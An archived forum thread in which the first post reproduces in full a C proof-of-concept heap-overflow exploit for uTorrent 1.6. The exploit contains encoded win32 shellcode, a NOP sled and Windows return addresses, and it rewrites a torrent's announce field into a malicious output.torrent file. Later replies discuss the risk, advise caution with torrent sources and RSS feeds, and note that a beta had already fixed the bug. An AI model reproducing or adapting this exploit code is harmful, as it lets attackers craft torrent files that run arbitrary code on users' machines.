Archived

This topic is now archived and is closed to further replies.

FLX

Utorrent 1.6 Remote Announce Heap Overflow Exploit POC

Recommended Posts

/*
* This is a PoC remote exploit for uTorrent 1.6
*
* Author:
* defsec <defacedsecurity@hotmail.com>
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and w2k sp1-4
*
*/

#include <stdio.h>
#include <stdlib.h>

#define NASIZE 4880

unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";

// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";

//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4
unsigned char jmptosc[] = "\xeb\x04\
\xa7\x2c\xc2\x77\
\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";

int main(int argc,char *argv[])
{
FILE * pFile;
long lSize;
char * buffer;
size_t result;

long i = 0;
long j = 0;
long lPtrIndex;
long lHeadSize;
long lTailSize;
char * curptr;
char * alptr;
char * torrentTail;

if (argc < 2)
{
printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]");
printf("\n\nUsage: ");
printf("%s",argv[0]);
printf(" <TorrentFile>\n");
return 0;
}

pFile = fopen (argv[1],"rb");
if (pFile==NULL)
{
fputs ("File error",stderr);
return 0;
}

// obtain file size:
fseek (pFile ,0,SEEK_END);
lSize = ftell (pFile);
rewind (pFile);

// allocate memory to contain the whole file:
buffer = (char*) malloc (sizeof(char)*lSize);
if (buffer == NULL)
{
fputs ("Memory error",stderr);
return 0;
}

// copy the file into the buffer:
result = fread (buffer,1,lSize,pFile);
if (result != lSize)
{
fputs ("Reading error",stderr);
return 0;
}

fclose (pFile);

/* find announce / announce-list and erase it */
alptr = (char *) strstr(buffer,"announce");
if (alptr == NULL)
{
printf("\ninvalid torrent file");
return 0;
}

curptr = (char *) strstr(alptr, "7:comment");
lHeadSize = curptr - buffer;
lTailSize = lSize - lHeadSize;

torrentTail = (char *) malloc (sizeof(char)*lTailSize);
memcpy(torrentTail,curptr,lTailSize);

/* generate offending header */
strcpy(nice_announce,"d8:announce4864:");
for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++)
nice_announce[lPtrIndex] = 0x90;
lPtrIndex = 84;
memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1);
lPtrIndex += sizeof(xorops) -1;
memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1);
for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++)
nice_announce[lPtrIndex] = jmptosc[i];

/* get head and tail together into a file */
curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize));
for (i=0;i<NASIZE;i++)
curptr[i] = nice_announce[i];
for (;i<(NASIZE+lTailSize);i++,j++)
curptr[i] = torrentTail[j];

/* write to file and exit */
pFile = fopen ( "output.torrent" , "wb" );
if (pFile==NULL)
{
fputs ("File error",stderr);
return 0;
}
fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile);
fclose (pFile);

return 1337; //:)
}

Just a heads up.

Share this post


Link to post
Share on other sites

Yah, previously reported on the IRC channel ;\

Just for clarification, it's an exploit that makes use of specifically-engineered .torrent files with corrupt dictionaries, and is not a remote security issue. What does it mean for users? Until a fix is implemented, be careful where you get your .torrent files from -- that's all. Do realize that if you're not sure you can trust all of your RSS feeds, disable them for the time being (so to prevent µTorrent from autoloading malicious .torrent files).

Share this post


Link to post
Share on other sites

"Koepi" (who first informed us on the channel) tested it on SP2, and supposedly, it did work. ^^inf^^ also confirmed it to be working. Not sure about arbitrary code execution though.

Share this post


Link to post
Share on other sites

I already saw a arbitrary code execution and a local privilege escalation poc where im from. But this is the only one that has been made public. Said to be working on win2000, xp sp1 and xp sp2.

Share this post


Link to post
Share on other sites

It begs the question, why has the beta version not been added to the download page yet? It's been the most recent, and fully stable, version for at least the past what, 3 months?

edit: Added to the download page as a beta, that is, since obviously it is a "beta"... betas USED to be added to the download page!

Share this post


Link to post
Share on other sites

I understand that. <_<

ugh.png

This. There used to be a beta download there. It's a bitch to scour the forums for that one topic with the download link in it when I want to grab the beta... v.v

Share this post


Link to post
Share on other sites

Oh my post wasn't actually a response so much as it was an update :P I'm not sure why it's not on the front page yet, but I guess they're waiting to update the automatic update server. Or something.

Share this post


Link to post
Share on other sites

Dunno, I kinda prefer that betas are linked to from the forum anyway -- it kinda encourages people to visit the forum and report bugs should any pop up.

Share this post


Link to post
Share on other sites

I wouldn't have even known there was a beta if I hadn't already been active in the forums... I think of the forums as the place to, as you said, report bugs... but the main site as the place to get official betas and releases... =\

Perhaps if they would link people - from the download page - to the forum topic about the beta... that would work well too. *shrug*

Hey, if the new 1.6.1 is coming out soon, all the better! I think it may have fixed my UPnP problem too, I dunno =)

Share this post


Link to post
Share on other sites

What piece of the story are we missing that "months" went by before the version of the program that the vast majority of the people know about and use (as opposed to a silent beta that was supposed to be only for the webui interface) was actually updated?

Was the exploit not public until this week? Was it maybe unconfirmed until this week that SP2 was vulnerable, thereby reducing the urgency to release the fix?

Share this post


Link to post
Share on other sites

beta 483 wasn't vulnerable to the issue and it was released last year. Ludde actually unintentionally fixed it when some stuff was rewritten, so it just wasn't known that there was an exploit in the first place.

Share this post


Link to post
Share on other sites